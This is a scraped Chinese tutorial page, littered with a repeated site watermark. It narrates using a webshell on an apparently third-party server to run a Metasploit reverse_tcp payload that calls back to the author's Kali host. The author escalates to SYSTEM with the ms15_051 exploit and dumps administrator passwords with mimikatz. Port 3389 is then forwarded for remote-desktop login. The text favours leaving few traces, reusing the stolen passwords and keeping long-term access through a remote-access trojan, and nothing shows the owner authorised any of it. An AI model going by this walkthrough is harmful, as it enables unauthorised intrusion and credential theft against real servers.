首页 > 电脑专区 > 互联网 >

使用Metasploit进行提权内网端口转发

来源:互联网 2023-03-02 15:29:23 391

本次测试环境(完全符合渗透测试标准,无查看下载修改删除等操作)jwE办公区 - 实用经验教程分享!

1.Webshell来自群内一位朋友发来的,目的仅为学习使用。jwE办公区 - 实用经验教程分享!

2.本次渗透测试使用kali2.0系统会在文章最后附上下载地址jwE办公区 - 实用经验教程分享!

3.本次渗透测试全部采用Metasploit框架来进行jwE办公区 - 实用经验教程分享!

工具/原料

  • kali2.0系统
  • Metasploit
  • cmd
  • 移动菜刀
  • background

提权过程

  • 1

    先来讲一下服务器的情况 ,开始执行cmd的时候提示了这个jwE办公区 - 实用经验教程分享!

    至于这个情况 也没有去Google搜,但是后来shell的主人告诉我 是目录权限问题,把cmd路径切换到C:\RECYCLER\cmd.exe即可正常执行jwE办公区 - 实用经验教程分享!

    切换了一下确实如此,具体原因没去思考。jwE办公区 - 实用经验教程分享!

    使用Metasploit进行提权内网端口转发jwE办公区 - 实用经验教程分享!

  • 2

    之后用metasploit生成payload(攻击载荷)jwE办公区 - 实用经验教程分享!

    因为本次过程主要讲渗透测试的细节jwE办公区 - 实用经验教程分享!

    如何生成payload的这种新手教学会在文章底部附上链接jwE办公区 - 实用经验教程分享!

    在这里我生成的payload名字叫ab.exejwE办公区 - 实用经验教程分享!

    通过菜刀把他上传到C:\RECYCLER\这个文件夹去jwE办公区 - 实用经验教程分享!

    然后通过菜刀执行cmd来运行payload。jwE办公区 - 实用经验教程分享!

    命令为上图所示start 文件路径即可jwE办公区 - 实用经验教程分享!

    这个命令在菜刀执行并不会提示成功与否。但是只要有权限就肯定可以执行的jwE办公区 - 实用经验教程分享!

    使用Metasploit进行提权内网端口转发jwE办公区 - 实用经验教程分享!

  • 3

    这里我们就直接说 start之后的事jwE办公区 - 实用经验教程分享!

    可以看到 一个ip为222.134.144.230的主机连接到了我的kali上。并且成功建立了一个metepreter会话。jwE办公区 - 实用经验教程分享!

    使用Metasploit进行提权内网端口转发jwE办公区 - 实用经验教程分享!

  • 3此文章非法爬取自百度经验
  • 4

    我们先background到msf界面去。 选择一下需要的提权exp,在这里讲一下选择exp的技巧。这里选择exp 并不是瞎选的。我相信很多新手在提权的过程中 都是拿着自己手上的几个exp(通常都是pr,巴西烤肉这些老家伙了。)来挨个测试,这个不行就换那个。但是这样是十分慢的,我们可以通过webshell调用cmd执行systeminfo命令来列出目标机打的补丁。找到不存在的补丁后来选择对应的exp提权。jwE办公区 - 实用经验教程分享!

    在这里也就不讲我怎么找到没打补丁的漏洞了,因为我是直接选了比较新的一个exp(exploit/windows/local/ms15_051_client_copy_image)来测试提权的,很多服务器都没打这个补丁(甚至万网的虚拟主机)jwE办公区 - 实用经验教程分享!

    这个图里缺了一部 但是因为已经关闭了kali就不好再截图了。缺的一步是jwE办公区 - 实用经验教程分享!

    set payload windows/meterpreter/reverse_tcp //选择payloadjwE办公区 - 实用经验教程分享!

    这个设置之后 就按照上图的执行就可以了 开始set SESSION 1 //这里这个set SESSION 参数是设置你的metepreter会话的id 我这里id是1 所以就设置为1。这样的话提权exp就会通过这个会话加载到目标机上执行。jwE办公区 - 实用经验教程分享!

    这一切都只在内存中操作。不会在磁盘上留下记录。jwE办公区 - 实用经验教程分享!

    使用Metasploit进行提权内网端口转发jwE办公区 - 实用经验教程分享!

  • 5

    执行之后,如果成功的话 会提示我们建立了一个新的session。jwE办公区 - 实用经验教程分享!

    这里我提权之后的session id为3jwE办公区 - 实用经验教程分享!

    我们在meterpreter中执行getuid来查看一下当前权限jwE办公区 - 实用经验教程分享!

    成功!获取了system权限。现在已经畅通无阻了。jwE办公区 - 实用经验教程分享!

    System高于administrator权限!jwE办公区 - 实用经验教程分享!

    使用Metasploit进行提权内网端口转发jwE办公区 - 实用经验教程分享!

    使用Metasploit进行提权内网端口转发jwE办公区 - 实用经验教程分享!

  • 6

    之后我们来查看一下服务器的网络状态jwE办公区 - 实用经验教程分享!

    执行ipconfigjwE办公区 - 实用经验教程分享!

    从ip可以基本看到 服务器完全处于内网中,应该是映射了80端口。jwE办公区 - 实用经验教程分享!

    朋友的目的是需要进行远程桌面连接。所以我们在这需要端口转发操作。jwE办公区 - 实用经验教程分享!

    使用Metasploit进行提权内网端口转发jwE办公区 - 实用经验教程分享!

  • 7

    Metasploit十分强大。他是一个完全开放的框架你可以加载任何它支持的脚本等。在这里我们加载一个内置的法国神器mimikatz,它可以读取虚拟内存中的文件,从而读到administrator的明文密码。可能有人会问为什么不添加账户进入,因为添加账户会留下更多的操作记录。并且读取明文密码的话 在大型的渗透测试中。可以将密码用于通杀账户使用。屡试不爽。jwE办公区 - 实用经验教程分享!

    接下来看操作jwE办公区 - 实用经验教程分享!

    首先load mimikatz //加载法国神器jwE办公区 - 实用经验教程分享!

    Wdigest//读取用户密码jwE办公区 - 实用经验教程分享!

    划红线的就是对应的账户密码。jwE办公区 - 实用经验教程分享!

    使用Metasploit进行提权内网端口转发jwE办公区 - 实用经验教程分享!

  • 8

    密码也有了 要到了转发端口的操作了 这个是最简单的了jwE办公区 - 实用经验教程分享!

    portfwdadd-l你本机的监听端口-r127.0.0.1-p3389jwE办公区 - 实用经验教程分享!

    执行之后所有端口3389的内网流量都会通过这个meterpreter的会话来转发到你kali的127.0.0.1的指定端口上 在这里我设置的监听端口为2222jwE办公区 - 实用经验教程分享!

    所以我执行的就是portfwdadd-l2222-r127.0.0.1-p3389jwE办公区 - 实用经验教程分享!

    然后开始连接远程桌面。新建一个终端窗口。jwE办公区 - 实用经验教程分享!

    执行连接Windows远程桌面的命令jwE办公区 - 实用经验教程分享!

    rdesktop127.1.1.0:2222jwE办公区 - 实用经验教程分享!

    连接后会出现登录窗口jwE办公区 - 实用经验教程分享!

    利用我们前面读到的账户密码即可进入jwE办公区 - 实用经验教程分享!

    使用Metasploit进行提权内网端口转发jwE办公区 - 实用经验教程分享!

  • 注意事项

    • kali2.0内移除了以前kali系统内置的metasploit框架(据说是因为metasploit的所有公司raid7这样要求的)但是我们还是可以通过metasploit的官网下载metasploit安装到kali中。简单方便
    • 前面提到了metepreter的强大。他几乎可以让你抛掉所有在Windows上的权限提升工具。重点在于它和metasploit完美的结合。Metasploit拥有各种漏洞的exploit。 这样攻击者也就不用在自己在电脑中准备一大堆exp了。
    • Metepreter与专业的远程控制软件不同。Metepreter更适合作为在获取最终权限之前 当做临时的桥梁。 而像灰鸽子这样的软件 则更适合做为在获取权限之后的长期监控中使用。

    以上方法由办公区教程网编辑摘抄自百度经验可供大家参考!jwE办公区 - 实用经验教程分享!


    标签: 互联网

    办公区 Copyright © 2016-2023 www.bgqu.net. Some Rights Reserved. 备案号:湘ICP备2020019561号统计代码